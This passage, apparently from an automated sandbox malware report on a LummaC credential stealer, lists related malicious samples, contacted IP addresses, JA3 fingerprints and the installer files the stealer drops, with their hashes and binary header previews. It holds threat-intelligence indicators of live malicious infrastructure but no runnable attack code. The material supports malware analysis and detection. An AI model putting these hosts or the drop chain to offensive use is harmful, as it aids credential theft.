                                                                                                                                                        • 185.161.251.21
                                                                                                                                                        Setup.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                        • 185.161.251.21
                                                                                                                                                        SET_UP.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                        • 185.161.251.21
                                                                                                                                                        Setup.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                        • 185.161.251.21
                                                                                                                                                        Active_Setup.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                                                        • 185.161.251.21
                                                                                                                                                        Active_Setup.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                        • 185.161.251.21
                                                                                                                                                        klipvumisui.shopSetup.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                        • 172.67.208.58
                                                                                                                                                        Full_Setup.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                        • 104.21.37.128
                                                                                                                                                        Setup.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                        • 104.21.37.128
                                                                                                                                                        Active_Setup.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                                                        • 104.21.37.128
                                                                                                                                                        re5.mp4.htaGet hashmaliciousLummaCBrowse
                                                                                                                                                        • 104.21.37.128
                                                                                                                                                        setup.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                        • 172.67.208.58
                                                                                                                                                        Active_Setup.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                        • 104.21.37.128
                                                                                                                                                        Set-up.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                        • 104.21.37.128
                                                                                                                                                        #Setup.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                        • 104.21.37.128
                                                                                                                                                        installer_1.05_36.5.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                        • 172.67.208.58

                                                                                                                                                        ASNs

                                                                                                                                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                        CLOUDFLARENETUSSetup.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                        • 172.67.208.58
                                                                                                                                                        Setup.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                        • 104.21.90.109
                                                                                                                                                        Full_Setup.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                        • 172.67.196.191
                                                                                                                                                        momo.spc.elfGet hashmaliciousMiraiBrowse
                                                                                                                                                        • 1.1.1.1
                                                                                                                                                        momo.ppc.elfGet hashmaliciousMiraiBrowse
                                                                                                                                                        • 1.1.1.1
                                                                                                                                                        momo.sh4.elfGet hashmaliciousMiraiBrowse
                                                                                                                                                        • 1.1.1.1
                                                                                                                                                        momo.x86.elfGet hashmaliciousMiraiBrowse
                                                                                                                                                        • 1.1.1.1
                                                                                                                                                        momo.m68k.elfGet hashmaliciousMiraiBrowse
                                                                                                                                                        • 1.1.1.1
                                                                                                                                                        z0r0.sh4.elfGet hashmaliciousMiraiBrowse
                                                                                                                                                        • 172.71.176.132
                                                                                                                                                        drop1.exeGet hashmaliciousCredGrabber, Meduza StealerBrowse
                                                                                                                                                        • 104.26.13.205
                                                                                                                                                        CLOUDFLARENETUSSetup.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                        • 172.67.208.58
                                                                                                                                                        Setup.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                        • 104.21.90.109
                                                                                                                                                        Full_Setup.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                        • 172.67.196.191
                                                                                                                                                        momo.spc.elfGet hashmaliciousMiraiBrowse
                                                                                                                                                        • 1.1.1.1
                                                                                                                                                        momo.ppc.elfGet hashmaliciousMiraiBrowse
                                                                                                                                                        • 1.1.1.1
                                                                                                                                                        momo.sh4.elfGet hashmaliciousMiraiBrowse
                                                                                                                                                        • 1.1.1.1
                                                                                                                                                        momo.x86.elfGet hashmaliciousMiraiBrowse
                                                                                                                                                        • 1.1.1.1
                                                                                                                                                        momo.m68k.elfGet hashmaliciousMiraiBrowse
                                                                                                                                                        • 1.1.1.1
                                                                                                                                                        z0r0.sh4.elfGet hashmaliciousMiraiBrowse
                                                                                                                                                        • 172.71.176.132
                                                                                                                                                        drop1.exeGet hashmaliciousCredGrabber, Meduza StealerBrowse
                                                                                                                                                        • 104.26.13.205
                                                                                                                                                        NTLGBSetup.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                        • 185.161.251.21
                                                                                                                                                        Setup.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                        • 185.161.251.21
                                                                                                                                                        Full_Setup.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                        • 185.161.251.21
                                                                                                                                                        momo.mips.elfGet hashmaliciousMiraiBrowse
                                                                                                                                                        • 82.18.222.135
                                                                                                                                                        momo.arm.elfGet hashmaliciousMiraiBrowse
                                                                                                                                                        • 82.17.192.171
                                                                                                                                                        momo.mpsl.elfGet hashmaliciousMiraiBrowse
                                                                                                                                                        • 82.128.104.220
                                                                                                                                                        momo.arm7.elfGet hashmaliciousMiraiBrowse
                                                                                                                                                        • 86.15.30.49
                                                                                                                                                        z0r0.m68k.elfGet hashmaliciousMiraiBrowse
                                                                                                                                                        • 86.17.1.179
                                                                                                                                                        z0r0.x86.elfGet hashmaliciousMiraiBrowse
                                                                                                                                                        • 81.99.50.70
                                                                                                                                                        z0r0.sh4.elfGet hashmaliciousMiraiBrowse
                                                                                                                                                        • 81.103.250.108

                                                                                                                                                        JA3 Fingerprints

                                                                                                                                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                        a0e9f5d64349fb13191bc781f81f42e1Setup.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                        • 104.21.37.128
                                                                                                                                                        • 188.114.96.3
                                                                                                                                                        • 185.161.251.21
                                                                                                                                                        Setup.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                        • 104.21.37.128
                                                                                                                                                        • 188.114.96.3
                                                                                                                                                        • 185.161.251.21
                                                                                                                                                        Full_Setup.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                        • 104.21.37.128
                                                                                                                                                        • 188.114.96.3
                                                                                                                                                        • 185.161.251.21
                                                                                                                                                        K27Yg4V48M.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                        • 104.21.37.128
                                                                                                                                                        • 188.114.96.3
                                                                                                                                                        • 185.161.251.21
                                                                                                                                                        IH5XqCdf06.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                        • 104.21.37.128
                                                                                                                                                        • 188.114.96.3
                                                                                                                                                        • 185.161.251.21
                                                                                                                                                        3jL3mqtjCn.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                        • 104.21.37.128
                                                                                                                                                        • 188.114.96.3
                                                                                                                                                        • 185.161.251.21
                                                                                                                                                        file.exeGet hashmaliciousLummaC, PureLog StealerBrowse
                                                                                                                                                        • 104.21.37.128
                                                                                                                                                        • 188.114.96.3
                                                                                                                                                        • 185.161.251.21
                                                                                                                                                        J18zxRjOes.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                        • 104.21.37.128
                                                                                                                                                        • 188.114.96.3
                                                                                                                                                        • 185.161.251.21
                                                                                                                                                        ZxSWvC0Tz7.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                        • 104.21.37.128
                                                                                                                                                        • 188.114.96.3
                                                                                                                                                        • 185.161.251.21
                                                                                                                                                        SOElePqvtf.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                        • 104.21.37.128
                                                                                                                                                        • 188.114.96.3
                                                                                                                                                        • 185.161.251.21

                                                                                                                                                        Dropped Files

                                                                                                                                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                        C:\Users\user\AppData\Local\Temp\LWU9W6M6UEEDFY7CFL4Y0PU0M3AUYM.exeSetup.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                          Full_Setup.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                            Setup.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                              Active_Setup.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                                                                setup.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                  Set-up.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                    #Setup.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                      installer_1.05_36.5.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                        @Setup.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                                                                          MdhO83N5Fm.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                            C:\Users\user\AppData\Local\Temp\is-DQ6NK.tmp\_isetup\_isdecmp.dllSetup.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                              Full_Setup.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                Setup.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                  qnUFsmyxMm.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                    Active_Setup.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                                                                                      setup.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                        Set-up.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                          #Setup.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                            installer_1.05_36.5.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                              @Setup.exeGet hashmaliciousLummaC StealerBrowse

                                                                                                                                                                                                Created / dropped Files

                                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                                                                                                                                                                Download File
                                                                                                                                                                                                Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                Size (bytes):64
                                                                                                                                                                                                Entropy (8bit):0.6599547231656377
                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                SSDEEP:3:Nllluly/:NllU
                                                                                                                                                                                                MD5:CD58C7193AF7B74B8F5AB012CEAA83D1
                                                                                                                                                                                                SHA1:48F5F741531E2611CC155853BB9BFCF470AD2262
                                                                                                                                                                                                SHA-256:AA0870FDCF90E60FC4555437FED5E92D49DE3A7C81E2E66D5763B25CF58EE4D7
                                                                                                                                                                                                SHA-512:B2F920ED07178691B4568D9459954BE281284DBA8E5DAC76147764180AE78306E32630098A1EA2F8D5721E56B87EE80E6C96BF73E96F44D3A19F15759613F3CF
                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                Preview:@...e...........................................................

                                                                                                                                                                                                C:\Users\user\AppData\Local\Temp\19e52a1d

                                                                                                                                                                                                Download File
                                                                                                                                                                                                Process:C:\Users\user\AppData\Roaming\ColorStreamLib\BrightLib.exe
                                                                                                                                                                                                File Type:PNG image data, 3792 x 2093, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                Size (bytes):6447207
                                                                                                                                                                                                Entropy (8bit):7.998441497232368
                                                                                                                                                                                                Encrypted:true
                                                                                                                                                                                                SSDEEP:196608:sXKjzP/kSY5cPYsvASGkG9166F/KHaj2M:sXKjrMSY5yPoxv/XL
                                                                                                                                                                                                MD5:B0CB3F07919BEB69B342ED871C6511A9
                                                                                                                                                                                                SHA1:C23C0B4F9810D50ECB9EA186F57325C7B41DEEBE
                                                                                                                                                                                                SHA-256:AB4A4A40AA1C1129150AE38AA4F939EB22B4125F6BE8F12251D7C76239B3F8F3
                                                                                                                                                                                                SHA-512:75BD57701CAC2BE23A9A63AE414F0E019D7C69523F93B3CE6D908B76CC382D84AB1F1C2B085633D39A8E7294C1879601A1A3B03C5871BA0E35A345F559E06AA4
                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                Preview:.PNG........IHDR.......-.....1S.... .IDATx..;..G....+.U={.. .....H.$..gm........1c...&.r....wm..=...-F...W....ft...Y.........~.3+.....|....?@@...o......\.._@...c....0.e..o..us).-.9~.4..:.H]..R.#M.K.!...#.s...4..G.c.#Zk.#B.s...p......R...PU....HUU..RJ.......^...Ru]..n...&w.R.WeE.DH.kB...)....!.....cRI.....d.u.....W..j..xw... .e,.....lC`....o=.^ `..d....;.nH..|k..3..}......'Ts.....D....C..h.{......$.}w.np..h.n1..U9\F..<[...J..\..............c..f.6.g.o......$.1..^z)..8..c$./.|3...s.9..&.|...r....L.q..I~{)..>.uw..oY.d../..ksw..P..p.]....T.K1.R..i.........I.9B.....D@@@..a/.?.[ 8.K|......H..X..T...4.{..c..4..!.^...}X~7.'......uc.$H................|.{5...Q...,..{..p..]v{....m.]).....[-.{..... !l......V..W k....u....g...$....[%>^.oI.|.......$.......$.g.@...m.hI~S;.).=...K%..H.T..d"....W.O.J.A..../%..@..J..-...ZW........oz....b.....B..x.1......>q.....[..I>..l...t..I..I..n....s....P..p...C..3..|.(..<..3r.F7d.#..;..".p..dg.p.#4Mm........}.....A.......

                                                                                                                                                                                                C:\Users\user\AppData\Local\Temp\LWU9W6M6UEEDFY7CFL4Y0PU0M3AUYM.exe

                                                                                                                                                                                                Download File
                                                                                                                                                                                                Process:C:\Users\user\Desktop\SET_UP.exe
                                                                                                                                                                                                File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                Category:modified
                                                                                                                                                                                                Size (bytes):8767044
                                                                                                                                                                                                Entropy (8bit):7.960152326344281
                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                SSDEEP:196608:r7B6e1u5SqD6mOefSP01pbtDgGFN6sskirwDODi:roweOFCS8jbtM8N6sjYY
                                                                                                                                                                                                MD5:51F99EDDD33CC04FB0F55F873B76D907
                                                                                                                                                                                                SHA1:60CD79359912A9069674CEE3C5C5982A9B01CE82
                                                                                                                                                                                                SHA-256:16E037D7B5F6A8E02B73671E1214B7979EB5D0AB0FC1106CF4C321F0FF53E13A
                                                                                                                                                                                                SHA-512:7D2DF781963C8AC8A6F2A86EB95742AA26C932671D31DF8F09E334B2AF5E543EC3FB636ABFA4FB2512EC70126E1B9DB6DC7E9446A2A85BCA53EAFC790668964A
                                                                                                                                                                                                Malicious:true
                                                                                                                                                                                                Antivirus:
                                                                                                                                                                                                • Antivirus: ReversingLabs, Detection: 74%
                                                                                                                                                                                                Joe Sandbox View:
                                                                                                                                                                                                • Filename: Setup.exe, Detection: malicious, Browse
                                                                                                                                                                                                • Filename: Full_Setup.exe, Detection: malicious, Browse
                                                                                                                                                                                                • Filename: Setup.exe, Detection: malicious, Browse
                                                                                                                                                                                                • Filename: Active_Setup.exe, Detection: malicious, Browse
                                                                                                                                                                                                • Filename: setup.exe, Detection: malicious, Browse
                                                                                                                                                                                                • Filename: Set-up.exe, Detection: malicious, Browse
                                                                                                                                                                                                • Filename: #Setup.exe, Detection: malicious, Browse
                                                                                                                                                                                                • Filename: installer_1.05_36.5.exe, Detection: malicious, Browse
                                                                                                                                                                                                • Filename: @Setup.exe, Detection: malicious, Browse
                                                                                                                                                                                                • Filename: MdhO83N5Fm.exe, Detection: malicious, Browse
                                                                                                                                                                                                Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L.....f.................t...p....................@.......................................@......@...................p..q....P.......................~..XG...........................................................R..\....`.......................text....V.......X.................. ..`.itext..d....p.......\.............. ..`.data...88.......:...x..............@....bss....Xr...............................idata.......P......................@....didata......`......................@....edata..q....p......................@..@.tls.....................................rdata..]...........................@..@.reloc..............................@..B.rsrc...............................@..@....................................@..@................

                                                                                                                                                                                                C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_eecvwsqu.ldb.psm1

                                                                                                                                                                                                Download File
                                                                                                                                                                                                Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                File Type:ASCII text, with no line terminators
                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                Size (bytes):60
                                                                                                                                                                                                Entropy (8bit):4.038920595031593
                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                                                                C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_rowdyhf4.rjn.ps1

                                                                                                                                                                                                Download File
                                                                                                                                                                                                Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                File Type:ASCII text, with no line terminators
                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                Size (bytes):60
                                                                                                                                                                                                Entropy (8bit):4.038920595031593
                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                                                                C:\Users\user\AppData\Local\Temp\is-DQ6NK.tmp\_isetup\_isdecmp.dll

                                                                                                                                                                                                Download File
                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\is-TCHJJ.tmp\LWU9W6M6UEEDFY7CFL4Y0PU0M3AUYM.tmp
                                                                                                                                                                                                File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                Size (bytes):35616
                                                                                                                                                                                                Entropy (8bit):6.953519176025623
                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                SSDEEP:768:Z4NHPfHCs6GNOpiM+RFjFyzcN23A4F+OiR9riuujF+X4UriXiRF:Zanvc+R9F4s8/RiPWuUs4UWXiv
                                                                                                                                                                                                MD5:C6AE924AD02500284F7E4EFA11FA7CFC
                                                                                                                                                                                                SHA1:2A7770B473B0A7DC9A331D017297FF5AF400FED8
                                                                                                                                                                                                SHA-256:31D04C1E4BFDFA34704C142FA98F80C0A3076E4B312D6ADA57C4BE9D9C7DCF26
                                                                                                                                                                                                SHA-512:F321E4820B39D1642FC43BF1055471A323EDCC0C4CBD3DDD5AD26A7B28C4FB9FC4E57C00AE7819A4F45A3E0BB9C7BAA0BA19C3CEEDACF38B911CDF625AA7DDAE
                                                                                                                                                                                                Malicious:true
                                                                                                                                                                                                Antivirus:
                                                                                                                                                                                                • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                Joe Sandbox View:
                                                                                                                                                                                                • Filename: Setup.exe, Detection: malicious, Browse
                                                                                                                                                                                                • Filename: Full_Setup.exe, Detection: malicious, Browse
                                                                                                                                                                                                • Filename: Setup.exe, Detection: malicious, Browse
                                                                                                                                                                                                • Filename: qnUFsmyxMm.exe, Detection: malicious, Browse
                                                                                                                                                                                                • Filename: Active_Setup.exe, Detection: malicious, Browse
                                                                                                                                                                                                • Filename: setup.exe, Detection: malicious, Browse
                                                                                                                                                                                                • Filename: Set-up.exe, Detection: malicious, Browse
                                                                                                                                                                                                • Filename: #Setup.exe, Detection: malicious, Browse
                                                                                                                                                                                                • Filename: installer_1.05_36.5.exe, Detection: malicious, Browse
                                                                                                                                                                                                • Filename: @Setup.exe, Detection: malicious, Browse
                                                                                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......g...#~..#~..#~...q.. ~..#~..!~......"~......+~......"~......"~..Rich#~..........................PE..L....[.L...........!.....6...........E.......P......................................D=...............................P.......P..(....................L.. ?...p.......................................................P...............................text....5.......6.................. ..`.rdata.......P.......:..............@..@.data...8....`.......<..............@....reloc.......p.......J..............@..B................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                C:\Users\user\AppData\Local\Temp\is-DQ6NK.tmp\_isetup\_setup64.tmp

                                                                                                                                                                                                Download File
                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\is-TCHJJ.tmp\LWU9W6M6UEEDFY7CFL4Y0PU0M3AUYM.tmp
                                                                                                                                                                                                File Type:PE32+ executable (console) x86-64, for MS Windows
                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                Size (bytes):6144
                                                                                                                                                                                                Entropy (8bit):4.720366600008286
                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                SSDEEP:96:sfkcXegaJ/ZAYNzcld1xaX12p+gt1sONA0:sfJEVYlvxaX12C6A0
                                                                                                                                                                                                MD5:E4211D6D009757C078A9FAC7FF4F03D4
                                                                                                                                                                                                SHA1:019CD56BA687D39D12D4B13991C9A42EA6BA03DA
                                                                                                                                                                                                SHA-256:388A796580234EFC95F3B1C70AD4CB44BFDDC7BA0F9203BF4902B9929B136F95
                                                                                                                                                                                                SHA-512:17257F15D843E88BB78ADCFB48184B8CE22109CC2C99E709432728A392AFAE7B808ED32289BA397207172DE990A354F15C2459B6797317DA8EA18B040C85787E
                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                Antivirus:
                                                                                                                                                                                                • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......^...............l...............=\......=\......=\......Rich............................PE..d.....R..........#............................@.............................`.......,......................................................<!.......P..H....@..0.................................................................... ...............................text............................... ..`.rdata..|.... ......................@..@.data...,....0......................@....pdata..0....@......................@..@.rsrc...H....P......................@..@................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                C:\Users\user\AppData\Local\Temp\is-K2ISP.tmp\_isetup\_isdecmp.dll

                                                                                                                                                                                                Download File
                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\is-L4TNG.tmp\LWU9W6M6UEEDFY7CFL4Y0PU0M3AUYM.tmp
                                                                                                                                                                                                File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                Size (bytes):35616
                                                                                                                                                                                                Entropy (8bit):6.953519176025623
                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                SSDEEP:768:Z4NHPfHCs6GNOpiM+RFjFyzcN23A4F+OiR9riuujF+X4UriXiRF:Zanvc+R9F4s8/RiPWuUs4UWXiv
                                                                                                                                                                                                MD5:C6AE924AD02500284F7E4EFA11FA7CFC
                                                                                                                                                                                                SHA1:2A7770B473B0A7DC9A331D017297FF5AF400FED8
                                                                                                                                                                                                SHA-256:31D04C1E4BFDFA34704C142FA98F80C0A3076E4B312D6ADA57C4BE9D9C7DCF26
                                                                                                                                                                                                SHA-512:F321E4820B39D1642FC43BF1055471A323EDCC0C4CBD3DDD5AD26A7B28C4FB9FC4E57C00AE7819A4F45A3E0BB9C7BAA0BA19C3CEEDACF38B911CDF625AA7DDAE
                                                                                                                                                                                                Malicious:true
                                                                                                                                                                                                Antivirus:
                                                                                                                                                                                                • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......g...#~..#~..#~...q.. ~..#~..!~......"~......+~......"~......"~..Rich#~..........................PE..L....[.L...........!.....6...........E.......P......................................D=...............................P.......P..(....................L.. ?...p.......................................................P...............................text....5.......6.................. ..`.rdata.......P.......:..............@..@.data...8....`.......<..............@....reloc.......p.......J..............@..B................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                C:\Users\user\AppData\Local\Temp\is-K2ISP.tmp\_isetup\_setup64.tmp

                                                                                                                                                                                                Download File
                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\is-L4TNG.tmp\LWU9W6M6UEEDFY7CFL4Y0PU0M3AUYM.tmp
                                                                                                                                                                                                File Type:PE32+ executable (console) x86-64, for MS Windows
                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                Size (bytes):6144
                                                                                                                                                                                                Entropy (8bit):4.720366600008286
                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                SSDEEP:96:sfkcXegaJ/ZAYNzcld1xaX12p+gt1sONA0:sfJEVYlvxaX12C6A0
                                                                                                                                                                                                MD5:E4211D6D009757C078A9FAC7FF4F03D4
                                                                                                                                                                                                SHA1:019CD56BA687D39D12D4B13991C9A42EA6BA03DA
                                                                                                                                                                                                SHA-256:388A796580234EFC95F3B1C70AD4CB44BFDDC7BA0F9203BF4902B9929B136F95
                                                                                                                                                                                                SHA-512:17257F15D843E88BB78ADCFB48184B8CE22109CC2C99E709432728A392AFAE7B808ED32289BA397207172DE990A354F15C2459B6797317DA8EA18B040C85787E
                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                Antivirus:
                                                                                                                                                                                                • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......^...............l...............=\......=\......=\......Rich............................PE..d.....R..........#............................@.............................`.......,......................................................<!.......P..H....@..0.................................................................... ...............................text............................... ..`.rdata..|.... ......................@..@.data...,....0......................@....pdata..0....@......................@..@.rsrc...H....P......................@..@................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                C:\Users\user\AppData\Local\Temp\is-L4TNG.tmp\LWU9W6M6UEEDFY7CFL4Y0PU0M3AUYM.tmp

                                                                                                                                                                                                Download File
                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\LWU9W6M6UEEDFY7CFL4Y0PU0M3AUYM.exe
                                                                                                                                                                                                File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                Size (bytes):3367424
                                                                                                                                                                                                Entropy (8bit):6.530011244733973
                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                SSDEEP:98304:qJYVM+LtVt3P/KuG2ONG9iqLRQEd333T:7VL/tnHGYiql5l
                                                                                                                                                                                                MD5:F809F51E678B7F2E388F8C969EF902C8
                                                                                                                                                                                                SHA1:DC1C645533E0FD1637BF455BA69A9481E7C4B83A
                                                                                                                                                                                                SHA-256:8D6E5513DE230109BE2238537173352832D1AEBDC7B10FAD0E59D4882812CA81
                                                                                                                                                                                                SHA-512:C500B40B604AD6203396FCC0243CBB50EAD544586EAB2448C2C6BCC2106DFAE3777A85C344766224F5F695FA60295880623B2A97B0AAE97DC547076FA03CD067
                                                                                                                                                                                                Malicious:true
                                                                                                                                                                                                Antivirus:
                                                                                                                                                                                                • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L.....f..................*...........*.......*...@..........................04.......3...@......@...................P,.n.....,.j:...P0.p.....................,.<............................p,.......................,......@,.(....................text.....*.......*................. ..`.itext..$.....*..0....*............. ..`.data.........*.......*.............@....bss.....|....+..........................idata..j:....,..<...f+.............@....didata.(....@,.......+.............@....edata..n....P,.......+.............@..@.tls....X....`,..........................rdata..]....p,.......+.............@..@.reloc..<.....,.......+.............@..B.rsrc...p....P0......./.............@..@.............04......`3.............@..@................

                                                                                                                                                                                                C:\Users\user\AppData\Local\Temp\is-TCHJJ.tmp\LWU9W6M6UEEDFY7CFL4Y0PU0M3AUYM.tmp

                                                                                                                                                                                                Download File
                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\LWU9W6M6UEEDFY7CFL4Y0PU0M3AUYM.exe
                                                                                                                                                                                                File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                Size (bytes):3367424
                                                                                                                                                                                                Entropy (8bit):6.530011244733973
                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                SSDEEP:98304:qJYVM+LtVt3P/KuG2ONG9iqLRQEd333T:7VL/tnHGYiql5l
                                                                                                                                                                                                MD5:F809F51E678B7F2E388F8C969EF902C8
                                                                                                                                                                                                SHA1:DC1C645533E0FD1637BF455BA69A9481E7C4B83A
                                                                                                                                                                                                SHA-256:8D6E5513DE230109BE2238537173352832D1AEBDC7B10FAD0E59D4882812CA81
                                                                                                                                                                                                SHA-512:C500B40B604AD6203396FCC0243CBB50EAD544586EAB2448C2C6BCC2106DFAE3777A85C344766224F5F695FA60295880623B2A97B0AAE97DC547076FA03CD067
                                                                                                                                                                                                Malicious:true
                                                                                                                                                                                                Antivirus:
                                                                                                                                                                                                • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L.....f..................*...........*.......*...@..........................04.......3...@......@...................P,.n.....,.j:...P0.p.....................,.<............................p,.......................,......@,.(....................text.....*.......*................. ..`.itext..$.....*..0....*............. ..`.data.........*.......*.............@....bss.....|....+..........................idata..j:....,..<...f+.............@....didata.(....@,.......+.............@....edata..n....P,.......+.............@..@.tls....X....`,..........................rdata..]....p,.......+.............@..@.reloc..<.....,.......+.............@..B.rsrc...p....P0......./.............@..@.............04......`3.............@..@................

                                                                                                                                                                                                C:\Users\user\AppData\Roaming\ColorStreamLib\BrightLib.exe (copy)

